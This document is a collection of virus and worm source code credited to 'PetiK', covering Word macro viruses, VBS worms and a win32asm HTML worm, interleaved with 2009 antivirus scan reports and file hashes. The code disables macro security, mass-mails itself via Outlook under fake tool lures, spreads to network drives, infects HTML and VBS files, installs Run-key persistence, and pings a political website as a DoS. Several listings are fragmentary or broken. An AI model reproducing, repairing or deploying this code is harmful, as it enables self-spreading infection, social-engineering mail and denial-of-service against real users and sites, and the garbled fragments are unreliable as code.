McAfee+Artemis 5616 2009.05.15 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.Y
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 VBS.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.I-Worm.Lee-Based
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_GENERIC.009
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.15 VBS.Pethar.A
Additional information
File size: 721 bytes
MD5...: 0316dbe5df244e6a4fc18ce96e7b3907
SHA1..: 1fea896705358384a6889d1a223f1416b2880902
' Name : W97M.Blood
' Author : PetiK
' Language : VBA Word
' Date : June 18th 2001
' Size : 2701 byte
'
'
'
'
' Macro AutoOpen : Disabled all protection against virus. Create
' \WINDOWS\blood.sys and put the macro code. If not exist the Blood
' key in the Windows key of regedit, W97M.Blood infects “NORMAL.DOT”.
' If the current day is the 15th it alters the name of the owner and
' the organization by “BloodMan” and “PetiK Corporation”.
'
' Macro HelpAbout : It displayas a balloon message.
'
' Macro ViewVBCode : Adds value in the run key to disabled the mouse
' and displays a message box.
'
' Macro AutoClose : It shoes a message box. After it calls two
' others macro.
' Macro PetiK : Create folder \WINDOWS\Blood and put the file
' TitleBlood.txt.
' Macro Attak : It pings the fucking web site of “Front National”.
' It’s a DoS attack.
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.Import DropFile
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
If Day(Now) = 15 Then
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") =
"BloodMan"
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\",
"RegisteredOrganization") = "PetiK Corporation"
End If
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") =
"rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical,
"W97M.Blood"
ShowVisualBasicEditor = True
End Sub
Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub
Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " Bye. PetiK"
Close #1
FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly
End Sub
Sub Attak()
Shell "ping -l 5000 -t www.front-national.fr", vbHide
Shell "ping -l 5000 -t front-national.fr", vbHide
End Sub
File Blood.doc received on 05.16.2009 10:45:39 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petman.A!IK
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.15 W97M/Petman.A
Avast 4.8.1335.0 2009.05.15 MW97:Petman-A
AVG 8.5.0.336 2009.05.15 W97M/Petman
BitDefender 7.2 2009.05.16 W97M.Petman.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Petik
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNtp
eTrust-Vet 31.6.6508 2009.05.16 W97M/Petman.A
F-Prot 4.4.4.56 2009.05.15 W97M/Petman.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Petman.A
GData 19 2009.05.16 W97M.Petman.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petman.A
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Petman.A
NOD32 4080 2009.05.15 W97M/Petman.A
Norman 6.01.05 2009.05.16 W97M/Petman.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petman.A
Panda 10.0.0.14 2009.05.15 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.15 WORD.97.Petik.M
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word97.Petik
Sophos 4.41.0 2009.05.16 WM97/Dool-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik (v)
Symantec 1.4.4.12 2009.05.16 W97M.Pet_Tick.Intd
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETMAN.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Blood
ViRobot 2009.5.15.1737 2009.05.15 W97M.Petman.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petik.M
Additional information
File size: 36864 bytes
MD5...: 8cd23603a72f1dcbdf22e03d49c17f83
SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335
' Name : VBS.Cachemire
' Author : PetiK
' Language : VBS
' Date : 19/06/2002
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
nt="Network"
crlf=Chr(13)&Chr(10)
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
y=0
Do Until y=Day(Now)
Sub spreadout()
y=y+1
Loop
If Day(Now) = Int((31 * Rnd) + 1) Then
ws.Run "notepad.exe"
wscript.Sleep 200
ws.SendKeys "Date : " & date & vbLf
ws.SendKeys "Time : " & time & crlf
x = 0
Do Until x=6
num = Int((6 * Rnd) + 1)
If num = 1 Then
mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous"
& vbCrlf
ElseIf num = 2 Then mess = "Why do you click unknown file ??" & crlf
ElseIf num = 3 Then mess = "A new creation coded by PetiK/[b8]" & crlf
ElseIf num = 4 Then mess = "Contact an AV support to disinfect your system" & crlf
ElseIf num = 5 Then mess = "Be careful next time" & crlf
ElseIf num = 6 Then mess = "Curiosity is bad" & crlf
End If
For i = 1 to Len(mess)
ws.SendKeys Mid(mess,i,1)
wscript.Sleep 50
Next
x=x+1
Loop
End If
End If
Sub spreadnetwrk(nname)
Set drve = ntw.EnumNetworkDrives
If drve.Count > 0 Then
For j = 0 To drve.Count -1
If drve.Item(j) <> "" Then
fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname)
End If
Next
End If
End Sub
Sub spreadout()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Backup your system..."
F.Body="Use this tool to create a backup of your system..."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(sys&"\MsBackup.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Cachemire.vbs received on 05.16.2009 11:21:06 (CET)
Additional information
File size: 2832 bytes
MD5...: 175dbf33282ed471b62d616be435a03f
SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376
' Name : W32.HLLW.Mars
' Author : PetiK
' Language : Visual Basic
' Date : 20/06/2002
'
'
'
'
Attribute VB_Name = "Module1"
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As
Long, ByVal dwReserved As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent
As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As
String, ByVal lFlags As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As
Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal
sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal
hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal
dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA"
(ByVal lpPathName As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public sysDir As String
Public winDir As String
Public orig As String
Public cop As String
Const CSIDL_STARTUP = &H7
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
On Error Resume Next
Dim sp, ext(1 To 9) As String, exts
ext(1) = "index.htm"
ext(2) = "index.html"
ext(3) = "index.asp"
ext(4) = "default.htm"
ext(5) = "default.html"
ext(6) = "default.asp"
ext(7) = "main.htm"
ext(8) = "main.html"
ext(9) = "main.asp"
Set ws = CreateObject("WScript.Shell")
sysDir = Space(500)
sysDir = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir)))
winDir = Space(500)
winDir = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir)))
orig = App.Path & "\" & App.EXEName & ".exe"
Call Install
Call VbsDrop
Call InfectExe(sysDir)
Call InfectExe(winDir)
checkconnect:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect
End Sub
Sub Install()
On Error Resume Next
Set ws = CreateObject("WScript.Shell")
FileCopy orig, sysDir & "\DebugW32.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir &
"\DebugW32.exe"
End Sub
Sub VbsDrop()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs"
For j = 1 To Len(sbufr)
If Mid(sBuffer, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(sBuffer, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call SendMail(mlto)
End If
Next
End Sub
Additional information
File size: 12800 bytes
MD5...: 1b81a0863eafb1a4b260df5c7c1d8621
SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : W32.HLLW.DocTor
' Author : PetiK
' Language : Visual Basic
' Date : 22/06/2002
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
org = App.Path & "\" & App.EXEName & ".exe"
docv = "C:\"
Randomize (Timer)
For i = 1 To 8
docv = docv & Chr(Int(Rnd(1) * 26) + 97)
Next i
docv = docv & ".txt"
Call Install
Call DocVir
Call VbsDrop
Else
Sleep 20000
DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
chkinet:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet
Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
If out = "Outlook" Then
map.Logon "profile", "password"
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 500 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "NewTool for Word Macro Virus"
mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf &
_
"Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _
"Best Regards. Have a nice day"
mel.Attachments.Add orig, 1, 1, "DocTor.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
End If
End Sub
Sub Install()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
End Sub
Sub DocVir()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
Sub VbsDrop()
On Error Resume Next
vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Private Sub Document_Open()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
pef = "4D5A900000000000..."
pef = pef & "0000000000C00000..."
pef = pef & "53206D6F64652E0D..."
pef = pef & "2AAA88526963689D..."
pef = pef & "00000000000000"
pef = pef & ""
Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
End Sub
File DocTor.exe received on 05.16.2009 11:30:42 (CET)
Additional information
File size: 11776 bytes
MD5...: 76ff0b311e26f1322c63023c30c54549
SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
File DocTor.doc received on 05.16.2009 11:30:41 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Dotor
AntiVir 7.9.0.168 2009.05.15 W2000M/Bumdoc.A
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Dotor
Authentium 5.1.2.4 2009.05.15 W97M/Dotor.A
Avast 4.8.1335.0 2009.05.15 MW97:Dotor-A
AVG 8.5.0.336 2009.05.15 W97M/Bumdoc
BitDefender 7.2 2009.05.16 W97M.Dotor.A
CAT-QuickHeal 10.00 2009.05.15 W97M.Ethan
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 W97M.Doctor
eSafe 7.0.17.0 2009.05.14 O97M.GNinducc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Dotor.A
F-Prot 4.4.4.56 2009.05.15 W97M/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W97M/Dotor.A
GData 19 2009.05.16 W97M.Dotor.A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Bumdoc.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Dotor.A
NOD32 4080 2009.05.15 W97M/Dotor.A
Norman 6.01.05 2009.05.16 W97M/Dotor.A
nProtect 2009.1.8.0 2009.05.16 W97M.Dotor.A
Panda 10.0.0.14 2009.05.15 W97M/Dotor.A
PCTools 4.4.2.0 2009.05.15 WORD.97.Pettor.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Dotor.A (v)
Symantec 1.4.4.12 2009.05.16 W97M.Dotor.A@mm
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 W97M.Dotor.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Pettor.A
Additional information
File size: 77312 bytes
MD5...: 762645157dbc893c564928edfed2413b
SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc
' Name : VBS.Park
' Author : PetiK
' Language : VBS
' Date : 24/06/2002
Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close
f="virhex="""
Sub list(dir)
On Error Resume Next
For each ssf in fs.GetFolder(dir).SubFolders
infect(ssf.path)
list(ssf.path)
Next
End Sub
Sub infect(dir)
For each fil in fs.GetFolder(dir).Files
ext=lcase(fs.GetExtensionName(fil.path))
If ext="vbs" Then
Set vb=fs.OpenTextFile(Q.path,1)
If vb.ReadLine <> ""'VBS.Park"" Then
vbsorg=vb.ReadAll()
vb.Close
Set vb=fs.OpenTextFile(Q.path,2)
vb.WriteLine read(virhex)
vb.WriteLine vbsorg
vb.Close
Else
vb.Close
End If
Set ht=fs.OpentextFile(P.path,1)
htmf=ht.ReadAll
ht.Close
If InStr(1,htmf,"virhex",1) = 0 Then
Set ht=fs.OpentextFile(P.path,8)
ht.WriteBlankLines(2)
ht.WriteLine "<SCRIPT LANGUAGE=VBScript>"
ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
ht.WriteLine f
ht.WriteLine "Infect(fso.GetSpecialFolder(0))"
ht.WriteLine "Infect(fso.GetSpecialFolder(1))"
ht.WriteLine "Infect(fso.GetSpecialFolder(2))"
ht.WriteLine "Infect(""C:\"")"
ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Desktop""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Favorites""))"
ht.WriteLine "Sub Infect(dir)"
ht.WriteLine "For each Q in fs.GetFolder(dir).Files"
ht.WriteLine "ext=lcase(fs.GetExtensionName(Q.Name))"
ht.WriteLine "If ext=""vbs"" Then"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,1)"
ht.WriteLine "If vb.ReadLine <> ""'VBS.Park"" Then"
ht.WriteLine "vbsorg=vb.ReadAll()"
ht.WriteLine "vb.Close"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,2)"
ht.WriteLine "vb.WriteLine read(virhex)"
ht.WriteLine "vb.WriteLine vbsorg"
ht.WriteLine "vb.Close"
ht.WriteLine "Else"
ht.WriteLine "vb.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "If ext=""htm"" or ext=""html"" Then"
ht.WriteLine "Set ht=fs.OpenTextFile(Q.Path,1)"
ht.WriteLine "If ht.ReadLine <> ""<vbshtmpark>"" Then"
ht.WriteLine "htmorg=ht.ReadAll()"
ht.WriteLine "ht.Close"
ht.WriteLine "Set ht=fs.CreateTextFile(Q.Path,2)"
ht.WriteLine "ht.WriteLine ""<vbshtmpark>"""
ht.WriteLine "ht.Write(htmorg)"
ht.WriteLine "ht.WriteLine document.body.CreateTextRange.htmltext"
ht.WriteLine "ht.Close"
ht.WriteLine "Else"
ht.WriteLine "ht.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "Next"
ht.WriteLine "End Sub"
ht.WriteLine "Function read(octet)"
ht.WriteLine "For hexa=1 To Len(octet) Step 2"
ht.WriteLine "read=read & Chr(""&h"" & Mid(octet, hexa, 2))"
ht.WriteLine "Next"
ht.WriteLine "End Function"
ht.WriteLine "</SCRIPT>"
ht.Close
End If
End If
Next
End Sub
File Park.vbs received on 05.16.2009 18:00:31 (CET)
Additional information
File size: 3107 bytes
MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0
SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb
comment *
Name : Worm.dilan aka adlin aka linda
Author : PetiK
Date : June 26th 2002
Language : win32asm
Spread via HTML file and infected other HTM/HTML files in these folders:
- WINDOWS
- WINDOWS\SYSTEM
- WINDOWS\TEMP
- DESKTOP
- MY DOCUMENTS
.586p
.model flat
.code
JUMPS
include useful.inc
include win32api.inc
api macro a
extrn a:proc
call a
endm
start: pushad
@SEH_SetupFrame <jmp end_worm>
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
push 0
push edi
push esi
api CopyFileA
push 50
push edi
push 1
@pushsz "ScanW32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset cpywrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
scan_mail:
xor edx,edx
mov edi,offset hex_f
push edi
p_c: lodsb
call conv_hex
stosw
car_s: dec size
cmp size,0
jne p_c
entr1: xor al,al
stosb
pop edi
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
push 0
push 5
push offset mydoc
push 0
api SHGetSpecialFolderPathA
@pushsz "\dilan.htm"
push offset mydoc
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset mydoc
api CreateFileA
mov [hhtm],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hhtm]
api WriteFile
push [hhtm]
api CloseHandle
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
mydoc db 70 dup (0)
hhtm dd ?
byte dd 0
size dd ?
Tab_Hex db "0123456789ABCDEF", 00h
s_htm: db '<dilan>',CRLF
db '<html><head><title>Only For You!</title></head><body>',CRLF
db '<script language=vbscript>',CRLF
db 'On Error Resume Next',CRLF
db 'Set fso=createobject("scripting.filesystemobject")',CRLF
db 'Set ws=createobject("wscript.shell")',CRLF
db 'If err.number=429 then',CRLF
db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to
see this file<br>'
db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK
YES</font>"',CRLF
db 'Else',CRLF
db 'asmhex="'
hex_f db 1024 * 13 dup (0)
db '"',CRLF
db 'read = dec(asmhex)',CRLF
db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF
db 'r.Write read',CRLF
db 'r.Close',CRLF
db 'ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc
anner.exe"',CRLF,CRLF
db 'infect(fso.GetSpecialFolder(0))',CRLF
db'infect(fso.GetSpecialFolder(1))',CRLF
db'infect(fso.GetSpecialFolder(2))',CRLF
db'infect(ws.SpecialFolders("MyDocuments"))',CRLF
db'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF
db'MsgBox "Sorry but your browser can''t read this Web file."',CRLF
db'End If',CRLF,CRLF
db'Function infect(dir)',CRLF
db'If fso.FolderExists(dir) Then',CRLF
db'For each cible in fso.GetFolder(dir).Files',CRLF
db'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF
db'If ext="htm" or ext="html" Then',CRLF
db'Set gd=fso.OpenTextFile(cible.path,1)',CRLF
db'If gd.readline <> "<dilan>" Then',CRLF
db'htmorg=gd.Readall',CRLF
db'gd.Close',CRLF
db'Set gd=fso.OpenTextFile(cible.path,2)',CRLF
db'gd.WriteLine "<dilan>"',CRLF
db'gd.Write(htmorg)',CRLF
db'gd.WriteLine document.body.createtextrange.htmltext',CRLF
db'gd.Close',CRLF
db'Else',CRLF
db'gd.Close',CRLF
db'End If',CRLF
db'End If',CRLF
db'Next',CRLF
db'End If',CRLF
db'End Function',CRLF,CRLF
db'Function dec(octe)',CRLF
db'On Error Resume Next',CRLF
db'For hexad = 1 To Len(octe) Step 2',CRLF
db'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF
db'Next',CRLF
db 'End Function',CRLF
db '</script></body></html>',CRLF
e_htm:
ends
end start
DILAN.HTM
<dilan>
<html><head><title>Only For You!</title></head><body>
<script language=vbscript>
On Error Resume Next
Set fso=createobject("scripting.filesystemobject")
Set ws=createobject("wscript.shell")
If err.number=429 then
document.write "<font face size='4' color=black>You need ActiveX enabled to see this
file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK
YES</font>"
Else
asmhex="4D5A50000200000004000F00FFFF..."
read = dec(asmhex)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)
r.Write read
r.Close
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc
anner.exe"
infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
MsgBox "Sorry but your browser can't read this Web file."
End If
Function infect(dir)
If fso.FolderExists(dir) Then
For each cible in fso.GetFolder(dir).Files
ext=lcase(fso.GetExtensionName(cible.Name))
If ext="htm" or ext="html" Then
Set gd=fso.OpenTextFile(cible.path,1)
If gd.readline <> "<dilan>" Then
htmorg=gd.Readall
gd.Close
Set gd=fso.OpenTextFile(cible.path,2)
gd.WriteLine "<dilan>"
gd.Write(htmorg)
gd.WriteLine document.body.createtextrange.htmltext
gd.Close
Else
gd.Close
End If
End If
Next
End If
End Function
Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
</script></body></html>
File Dilan.exe received on 05.16.2009 11:30:36 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win-Trojan/Dilna.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.B2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.15 W32/Dilan.A
Avast 4.8.1335.0 2009.05.15 Win32:Petik-B
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
CAT-QuickHeal 10.00 2009.05.15 Worm.Petik.b
ClamAV 0.94.1 2009.05.15 Worm.Petik.B
Comodo 1157 2009.05.08 Worm.Win32.Petik.AD
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.20480
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5120.C
F-Prot 4.4.4.56 2009.05.15 W32/Dilan.A
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik.b
Fortinet 3.117.0.0 2009.05.16 W32/Petik.F
